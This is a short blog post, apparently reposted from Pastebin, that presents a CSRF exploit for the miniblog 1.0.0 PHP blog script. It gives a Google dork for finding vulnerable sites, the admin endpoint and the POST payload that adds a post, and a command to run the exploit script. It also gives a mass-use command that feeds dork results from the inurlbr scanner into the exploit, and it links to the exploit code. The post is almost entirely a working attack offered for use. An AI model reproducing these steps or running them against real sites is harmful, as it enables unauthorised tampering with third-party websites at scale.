Pages

Tuesday, 26 May 2015

miniblog 1.0.0 CSRF 4ADD post / INURL BRASIL

# Vendor:        http://www.spyka.net/scripts/php/miniblo
 
  # Google Dork:   intext:"Powered by miniblog" ext:php
 
  # POC:           http://{YOU_URL}/adm/admin.php?mode=add
 
  # SEND REQUEST POST
  adddata[post_title]=TITLE&data[post_content]=<b>YOU_POST</b>&data[published]=1&miniblog_PostBack=Add
  ------------------------------------------------------------------------------
 
  # EXECUTE:       php xpl.php -t http://target.us
 
  # FILE_OUTPUT :  miniblog_vuln.txt
 
  # EXPLOIT MASS USE SCANNER INURLBR
  php inurlbr.php --dork 'intext:"Powered by miniblog" ext:php' -s output.txt --command-all 'php xpl.php -t _TARGET_'
  More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR
  ------------------------------------------------------------------------------
 
 
 */
ACESSO EXPLOIT CODE-->>> https://github.com/googleinurl/miniblog-1.0.0-CSRF-4ADD-post-INURL-BRASIL
 
sumber: Pastebin

1 comment: